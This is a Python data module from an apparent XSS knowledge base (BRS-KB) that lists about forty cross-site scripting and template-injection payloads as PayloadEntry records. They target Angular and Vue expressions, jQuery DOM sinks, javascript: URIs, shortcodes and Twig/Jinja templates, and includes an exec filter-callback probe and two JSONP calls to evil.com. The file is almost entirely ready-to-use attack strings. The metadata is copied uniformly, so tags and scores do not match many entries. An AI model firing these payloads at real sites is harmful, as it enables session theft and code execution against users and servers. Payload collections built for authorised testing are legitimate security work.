#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Framework Specific Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


FRAMEWORK_SPECIFIC_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "framework_specific_043": PayloadEntry(
        payload="@focus=\"constructor.constructor('alert(1)')\" autofocus",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_044": PayloadEntry(
        payload="@mouseover=\"constructor.constructor('alert(1)')\"",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_045": PayloadEntry(
        payload="{{this.constructor.constructor('alert(1)')()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_046": PayloadEntry(
        payload="{{$root.$el.ownerDocument.defaultView.alert(1)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_047": PayloadEntry(
        payload="{{Object.constructor.constructor('alert(1)')()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_048": PayloadEntry(
        payload="v-for=\"item in constructor.constructor('alert(1)')\"",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_049": PayloadEntry(
        payload="<slot>{{constructor.constructor('alert(1)')()}}</slot>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_050": PayloadEntry(
        payload="<component :is=\"constructor.constructor('alert(1)')\"></component>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_051": PayloadEntry(
        payload='$("<script>alert(1)</script>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_052": PayloadEntry(
        payload='$("<img src=x onerror=alert(1)>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_053": PayloadEntry(
        payload='$("<svg onload=alert(1)>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_054": PayloadEntry(
        payload='$("body").html("<script>alert(1)</script>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_055": PayloadEntry(
        payload='$("div").html("<img src=x onerror=alert(1)>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_056": PayloadEntry(
        payload='$("img").attr("src","javascript:alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_057": PayloadEntry(
        payload='$("a").attr("href","javascript:alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_058": PayloadEntry(
        payload='$("iframe").attr("src","javascript:alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_059": PayloadEntry(
        payload='$("body").append("<script>alert(1)</script>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_060": PayloadEntry(
        payload='$("head").prepend("<script>alert(1)</script>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_061": PayloadEntry(
        payload='$("body").on("click",function(){alert(1)})',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_062": PayloadEntry(
        payload='$("*").bind("mouseover",function(){alert(1)})',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_063": PayloadEntry(
        payload='$.getJSON("//evil.com/jsonp?callback=alert")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_064": PayloadEntry(
        payload='$.ajax({url:"//evil.com",dataType:"jsonp",jsonpCallback:"alert"})',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_065": PayloadEntry(
        payload='$.globalEval("alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_066": PayloadEntry(
        payload='$.parseHTML("<script>alert(1)</script>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_067": PayloadEntry(
        payload='$.parseHTML("<img src=x onerror=alert(1)>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_068": PayloadEntry(
        payload="[script]alert(1)[/script]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_069": PayloadEntry(
        payload='[iframe src="javascript:alert(1)"]',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_070": PayloadEntry(
        payload="<!--<script>alert(1)</script>-->",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_071": PayloadEntry(
        payload='[gallery id="<script>alert(1)</script>"]',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_072": PayloadEntry(
        payload='[caption id="<script>alert(1)</script>"]',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_073": PayloadEntry(
        payload="[embed]<script>alert(1)</script>[/embed]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_074": PayloadEntry(
        payload="{{alert(1)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_075": PayloadEntry(
        payload="<%=alert(1)%>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_076": PayloadEntry(
        payload='" onload="alert(1)" "',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_077": PayloadEntry(
        payload='{{7*7}}{{_context.request.query.get("callback")}}',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_078": PayloadEntry(
        payload="{{dump(app)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_079": PayloadEntry(
        payload='{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("alert(1)")}}',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_080": PayloadEntry(
        payload="[javascript:alert(1)]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_081": PayloadEntry(
        payload="[filter:javascript:alert(1)]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_082": PayloadEntry(
        payload="[filter:eval:alert(1)]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_083": PayloadEntry(
        payload="{{7*7}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_084": PayloadEntry(
        payload="{{config}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
}
